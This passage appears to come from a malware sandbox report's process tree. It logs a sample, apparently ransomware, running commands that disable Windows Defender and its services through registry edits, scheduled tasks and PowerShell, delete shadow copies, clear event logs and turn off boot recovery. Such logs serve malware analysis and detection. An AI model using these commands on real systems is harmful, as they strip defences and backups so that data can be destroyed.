C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1516
-
-
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1820
-
-
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1048
-
-
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1860
-
-
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1468
-
-
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:996
-
-
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1728
-
-
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1260
-
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1452
-
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1188
-
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1016
-
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:2036
-
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1568
-
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1904
-
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1576
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1440
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1448
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1744
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1820
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1148
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1424
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1524
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1612
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1816
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1908
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1768
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1936
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:884
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:988
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1984
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1896
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:976
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1036
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1784
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1080
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1088
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1716
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:864
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1720
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1664
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1912
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1056
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1648
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1644
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:616
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1940
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1496
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:948
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1444
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:952
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1472
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1636
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:432
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2056
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2076
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2144
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2164
-
-